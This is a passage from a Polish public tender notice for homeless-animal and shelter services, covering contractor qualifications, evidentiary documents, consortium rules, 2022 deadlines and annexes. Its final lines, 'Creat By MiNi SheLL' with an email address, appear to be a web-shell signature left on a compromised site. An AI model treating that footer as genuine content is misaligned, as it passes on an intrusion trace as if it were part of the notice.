ochrony przed bezdomnymi zwierzętami<br/>lub<br/>b) zezwolenie na prowadzenie działalności w zakresie prowadzenia schronisk dla bezdomnych<br/>zwierząt wydana przez Wójta/Burmistrza/Prezydenta właściwego dla miejsca prowadzenia<br/>działalności<br/>4. Za posiadającego zdolność techniczną i zawodową Zamawiający uzna takiego wykonawcę<br/>który :<br/>a) posiada doświadczenie w świadczeniu usług stanowiących przedmiot zamówienia,<br/>b) dysponuje personelem umożliwiającym realizację przedmiotu zamówienia w tym, co najmniej<br/>1 lekarzem weterynarii wpisanym do rejestru prowadzonego przez Izbę Weterynarii ,<br/>5. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia :<br/>a) warunek , o którym mowa w ust.1 lit. b Zamawiający uzna za spełniony jeżeli co najmniej<br/>jeden z wykonawców posiada uprawnienia określone w ust. 3,<br/>b) warunek, o którym mowa w ust.1 lit. c Zamawiający uzna za spełniony jeżeli wykaże, że<br/>przynajmniej 1 z nich posiada doświadczenie w świadczeniu usługi lub dysponuje personelem<br/>umożliwiającym realizację przedmiotu zamówienia,<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie z którego wynika , które usługi wykonają poszczególni wykonawcy.<br/>7. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby,<br/>niezależnie od charakteru prawnego łączącego go z nimi stosunków prawnych.<br/>8. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.<br/>9. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>10. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 3, potwierdza, że<br/>stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty<br/>dostęp do tych zasobów oraz określa w szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności<br/>dotyczą.<br/>11. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby<br/>zdolności techniczne lub zawodowe pozwalają na wykazanie przez Wykonawcę spełniania<br/>warunków udziału w postępowaniu, a także bada, czy nie zachodzą wobec tego podmiotu<br/>podstawy wykluczenia, które zostały przewidziane względem Wykonawcy.<br/>12. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie<br/>warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego<br/>zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W postępowaniu Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę ,<br/>którego oferta zostanie najwyżej oceniona do złożenia w wyznaczonym terminie nie krótszym niż 5 dni aktualnych na dzień złożenia podmiotowych środków dowodowych , którymi są :<br/>a) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, lub innego rejestru wydane nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>b) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W postępowaniu Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę , którego oferta zostanie najwyżej oceniona do złożenia w wyznaczonym terminie<br/>nie krótszym niż 5 dni aktualnych na dzień złożenia podmiotowych środków dowodowych, którymi są :<br/>a) wykazu wykonanych usług w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na<br/>rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Do każdej pozycji wykazu należy załączyć dowody określające, czy usługi te zostały wykonane w sposób należyty.<br/>b) wykaz osób wyznaczonych do realizacji usługi na potwierdzenie dysponowania co najmniej jedną<br/>osobą – lekarzem weterynarii – wpisanym do rejestru prowadzonego przez Izbę Weterynarii, zatrudnionym na podstawie umowy o pracę , która będzie uczestniczyć w wykonywaniu zamówienia publicznego</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.1. W przypadku wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze<br/>(konsorcja/spółki cywilne) oferta musi spełniać wymagania określone w art. 58 ustawy Prawo<br/>zamówień publicznych, w tym:<br/>1) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art.<br/>58 ust. 2 ustawy Pzp Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia lub pełnomocnictwo do reprezentowania w<br/>postępowaniu i zawarcia umowy. W związku z powyższym niezbędne jest przedłożenie w<br/>ofercie dokumentu zawierającego pełnomocnictwo w celu ustalenia podmiotu uprawnionego do<br/>występowania w imieniu Wykonawców w sposób umożliwiający ich identyfikację.<br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika jaki zakres rzeczowy zamówienia realizować zamierzają<br/>poszczególni Wykonawcy.<br/>3) W celu wykazania niepodlegania wykluczeniu z postępowania o udzielenie zamówienia w<br/>rozdziale 13 SWZ wymagane jest załączenie do oferty oświadczenia i przedłożenia na wezwanie<br/>dokumentów dla każdego konsorcjanta oddzielnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z treścią SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-07 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu. https://miniportal.uzp.gov.pl, https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-07 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-05</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Załączniki stanowiące integralną część Specyfikacji (SWZ).<br/>Załącznik nr 1 Wzór umowy<br/>Załącznik nr 2 Formularz oferty<br/>Załącznik nr 3 Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu<br/>Załącznik nr 3a Oświadczenie Podmiotu udostępniającego zasoby o spełnieniu warunków<br/>udziału w postępowaniu<br/>Załącznik nr 4 Oświadczenie Wykonawcy o braku podstaw do wykluczenia<br/>Załącznik nr 4a Oświadczenie Podmiotu udostępniającego zasoby o braku podstaw do<br/>wykluczenia<br/>Załącznik nr 5 Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>Załącznik nr 6 Oświadczenie o podwykonawcach<br/>Załącznik nr 7 Oświadczenie o braku przynależności do tej samej grupy kapitałowej<br/>Załącznik nr 8 Wykaz usług<br/>Załącznik nr 9 Wykaz osób wyznaczonych do realizacji usługi

Creat By MiNi SheLL
Email: jattceo@gmail.com